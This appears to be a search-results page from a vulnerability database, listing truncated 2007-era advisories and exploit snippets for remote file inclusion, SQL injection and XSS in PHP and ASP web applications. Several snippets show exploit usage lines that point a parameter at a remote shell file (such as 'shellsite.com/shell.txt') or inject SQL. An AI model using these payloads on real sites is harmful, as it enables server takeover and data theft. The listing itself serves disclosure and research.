984 matches found
mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion
!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...
CVE-2007-2020
Unspecified vulnerability in administration.php in xodagallery allows remote attackers to execute arbitrary code via the cmd parameter. NOTE: CVE disputes this vulnerability because administration.php does not use the cmd parameter for inclusion...
PT-2007-3364 · Xo Design · Xodagallery
Name of the Vulnerable Software and Affected Versions: xodagallery affected versions not specified Description: The issue allows remote attackers to execute arbitrary code via the cmd parameter in administration.php. However, it's noted that administration.php does not use the cmd parameter for...
PHPRaid 3.0.7 - rss.php?PHPraid_dir Remote File Inclusion
PHPRaid 3.0.7 - rss.php?PHPraiddir Remote File Inclusion !/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// ||...
Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion
!/usr/bin/perl Active PHP Bookmark Notes 0.2.5 cmd shell example: Ex: http://localhost/apbn/templates/head.php?APBSETTINGStemplatepath=http://localhost/tryag.txt Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2;...
Sql injection
SQL injection vulnerability in index.php in WBBlog allows remote attackers to execute arbitrary SQL commands via the eid parameter in a viewentry cmd...
Cross site scripting
Cross-site scripting XSS vulnerability in index.php in WBBlog allows remote attackers to inject arbitrary web script or HTML via the eid parameter in a viewentry cmd...
CVE-2007-1481
SQL injection vulnerability in index.php in WBBlog allows remote attackers to execute arbitrary SQL commands via the eid parameter in a viewentry cmd...
CVE-2007-1482
Summary: CVE-2007-1482 is an XSS vulnerability in WBBlog’s index.php, exploited via the e_id parameter in a viewentry cmd. Affected component: WBBlog, index.php. The underlying issue is a Cross-site scripting flaw that allows remote attackers to inject arbitrary web script or HTML. Impact (as sta...
Absolute Image Gallery 2.0 (gallery.php categoryid) SQL Injection Vuln
No description provided by source. Absolute Image Gallery Gallery.ASP categoryid MSSQL Injection Exploit Type : SQL Injection Release Date : 2007-03-15 Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug :...
Absolute Image Gallery 2.0 - gallery.asp?categoryId SQL Injection
Absolute Image Gallery 2.0 - gallery.asp?categoryId SQL Injection Absolute Image Gallery Gallery.ASP categoryid MSSQL Injection Exploit Type : SQL Injection Release Date : 2007-03-15 Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug :...
Absolute Image Gallery 2.0 (gallery.php categoryid) SQL Injection Vuln
Exploit for asp platform in category web applications ====================================================================== Absolute Image Gallery 2.0 gallery.php categoryid SQL Injection Vuln ====================================================================== Absolute Image Gallery Gallery.A...
Absolute Image Gallery 2.0 - 'gallery.asp?categoryId' SQL Injection
Absolute Image Gallery Gallery.ASP categoryid MSSQL Injection Exploit Type : SQL Injection Release Date : 2007-03-15 Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug : http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-...
CVE-2007-1429
CVE-2007-1429 affects Moodle 1.7.1, exposing remote PHP code execution via remote file inclusion. The vulnerability allows an attacker to supply a URL in the cmd parameter to either admin/utfdbmigrate.php or filter.php, leading to arbitrary code execution on the server. Multiple connected sources...
CVE-2007-1429
Multiple PHP remote file inclusion vulnerabilities in Moodle 1.7.1 allow remote attackers to execute arbitrary PHP code via a URL in the cmd parameter to 1 admin/utfdbmigrate.php or 2 filter.php...
PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit
Exploit for unknown platform in category web applications ================================================================= PostNuke Module phgstats 0.5 phgdir Remote File Include Exploit ================================================================= PostNuke Module phgstats 0.5 phgdir Remote...
PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit
Exploit for unknown platform in category local exploits ================================================================ PHP COM extensions inconsistent Win32 safemode Bypass Exploit ================================================================ Run'c:\windows\system32\cmd.exe /c...
Opera <= 9.10 Configuration Overwrite
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
The script pictures the back door without echo solutions-vulnerability warning-the black bar safety net
First of all, let us think about why the picture of the back door is not back obvious reason: as you know, we use the include contains picture, the interpreter will put the picture as a text document for searching and automatic parsing% %or??& gt;of the script. So what other html characters such...
phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit
Exploit for unknown platform in category web applications ============================================================== phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit ============================================================== !/usr/bin/perl phpBB Module NoMoKeTos Rules 0.0.1...